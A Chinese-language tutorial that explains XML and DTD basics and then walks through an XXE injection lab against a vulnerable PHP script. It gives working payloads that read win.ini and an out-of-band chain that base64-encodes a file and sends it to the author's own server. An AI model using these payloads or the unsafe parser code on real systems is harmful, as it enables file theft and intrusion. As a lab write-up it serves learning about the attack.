关于xml
XML 指可扩展标记语言(EXtensible Markup Language)。是一种标记语言,类似于HTML。XML是用来传输数据的,而非显示数据。XML 标签没有被预定义。您需要自行定义标签。xml由五个部分构成(元素
,属性,实体,PCDATA,CDATA)
xml基础
<?xml version="1.0" encoding="ISO-8859-1"?>
<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note>
xml的一个实例,第一行是xml的声明,包括版本信息和编码信息的设置
<note>为文档的根元素,根元素必须存在,它是所有子元素的父元素
<to> <from>等为根元素的子元素,例子中有四个子元素。
xml的所有元素都要有闭合标签,省略闭合标签就会报错
《XML详细学习》
xml实体引用
xml实体是xml的组成之一,在xml中会存在一些特殊意义的字符,比如xml的‘<’
如果出现在xml的元素中会存在解析错误,为了避免这个错误我们可以用实体引用来代替
xml中预定义的5中实体引用
< |
< | less than |
|---|---|---|
> |
> | greater than |
& |
& | ampersand |
' |
' | apostrophe |
" |
" | quotation mark |
xml DTD(文档类型定义)
DTD可定义合法的XML文档构建模块,来验证xml是否合法。
DTD可被声明在xml的文档中,也可以作为一个外部引用
- 当DTD在xml内部声明时,要用使用
DOCTYPE语法包装声明
<!DOCTYPE 根元素 [元素声明]>
例如
<?xml version="1.0"?>
<!DOCTYPE note [ 定义此文档是 note 类型的文档。
<!ELEMENT note (to,from,heading,body)> 定义 note 元素有四个元素:"to、from、heading,、body"
<!ELEMENT to (#PCDATA)> 定义 to 元素为 "#PCDATA" 类型
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note>
- 当DTD位于xml文档外部,引用方法
<!DOCTYPE 根元素 SYSTEM "文件名">
xml文档
<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note>
DTD文档
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
DTD构建实体
- 内部实体声明
<!ENTITY 实体名称 "实体的值">
一个实体由三部分构成: 一个和号 (&), 一个实体名称, 以及一个分号 (;)
DTD实体声明
<!ENTITY writer "Bill Gates">
<!ENTITY copyright "Copyright W3School.com.cn">
xml调用
<author>&writer;©right;</author>
- 外部实体声明
<!ENTITY 实体名称 SYSTEM "URI/URL">
DTD实体声明
<!ENTITY writer SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
<!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
xml调用
<author>&writer;©right;</author>
xml实体注入利用
使用php进行测试,php版本为5.4.45。
有回显测试
<?php
$xml=$_GET['xml'];
$data = @simplexml_load_string($xml);
print_r($data);
?>
simplexml_load_string()转换形式良好的 XML 字符串为 SimpleXMLElement 对象,然后输出对象的键和元素(php,python,java等都有类似函数)
0x01使用xml外部实体读取本地文件
payload
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [<!ENTITY file SYSTEM "file:///c:/Windows/win.ini">]>
<note>&file;</note>
把自己的windows作为了靶机,读取的是win.ini文件
将payload进行url编码传入
0x02 xml引用外部实体(引用DTD文件)
因为在本地测试,使用的时候用的是本地虚拟机当服务器,存放文件进行引用
payload
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [<!ENTITY % a SYSTEM "http://192.168.8.132/html/dtdfile.dtd"> %a;]>
<note>&file;</note>
DTD(dtdfile.dtd)
<!ENTITY file SYSTEM "file:///c:/Windows/win.ini">
无回显测试
可以将结果打到服务器上,查看日志,或则将结果保存为文件(同样是在内网,使用虚拟机测试)
测试文件
$xml=$_GET['xml'];
$data = @simplexml_load_string($xml);
在自己服务器建立xml文件(2.xml)用于引用
<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/Windows/win.ini">
<!ENTITY % int "<!ENTITY % trick SYSTEM 'http://192.168.8.132/html/get.php?id=%payload;'>">
%int;
%trick;
读取的攻击目标文件内容时,使用的php://filter将文件内容进行了base64编码,因为当我们读取的文件是php或则html文件时,文件的代码包含< >符号时会导致解析错误
同目录下建立php(get.php)用于接受并且保存读取的文件
<?php
file_put_contents('test/1.txt',$_GET['id']);
?>
#在测试时发现file_put_contents()写入权限不够,所以建了一个test文件夹,并给777权限
payload
<!DOCTYPE root[
<!ENTITY % remote SYSTEM "http://192.168.8.132/html/2.xml">
%remote;]>
<root/>
在请求中引用2.xml文件,2.xml中读取攻击目标内容,并将内容以http请求参数的方式打回自己的服务器。在自己服务器上创建get.php,get.php接受请求并将参数内容保存为txt文档
查看日志和文档我们都能看到结果
因为文件的内容是经过base64编码的,所以可以通过解码查看获取的内容
xml支持的各种协议方法
xml不仅可以任意读取文件,执行系统命令,探测内网端口和攻击内网网站
参考blog
XML实体注入漏洞有关于另外xxe攻击的pyload和防御方法
XML实体注入漏洞攻与防
小试XML实体注入攻击
XML实体注入漏洞的利用与学习
